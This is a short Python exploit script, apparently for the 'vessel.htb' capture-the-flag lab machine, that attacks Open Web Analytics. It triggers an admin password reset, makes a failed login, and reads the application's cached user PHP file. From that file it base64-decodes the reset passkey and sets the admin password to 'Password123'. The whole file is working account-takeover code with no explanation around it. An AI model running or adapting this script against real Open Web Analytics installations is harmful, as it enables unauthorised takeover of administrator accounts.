import requests, base64

proxy = {'http':'http://127.0.0.1:8080'}

if __name__ == '__main__':
    print("requesting admin reset")
    s = requests.session()
    data = {
        'owa_email_address':'admin@vessel.htb',
        'owa_action':'base.passwordResetRequest',
        'owa_submit':'Request New Password'
    }
    s.post("http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm", data=data, proxies=proxy)
    print("false login on admin")
    data = 'owa_user_id=admin&owa_password=password&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&owa_action=base.login&owa_submit_btn=Login'
    s.post('http://openwebanalytics.vessel.htb/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&', data=data, proxies=proxy)

    r = s.get('http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php')
    b = base64.b64decode(r.text[9:-6])
    temp_pass = b.decode().split("temp_passkey")[1][57:89]
    print(temp_pass)
    data = f'owa_password=Password123&owa_password2=Password123&owa_k={temp_pass}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password'
    h = {
        'Referer': 'http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword',
        'Origin': 'http://openwebanalytics.vessel.htb',
        'Content-Type': 'application/x-www-form-urlencoded'
    }


    r = s.post('http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword', headers=h, data=data, proxies=proxy)
    print("Password changed to 'Password123")
    pass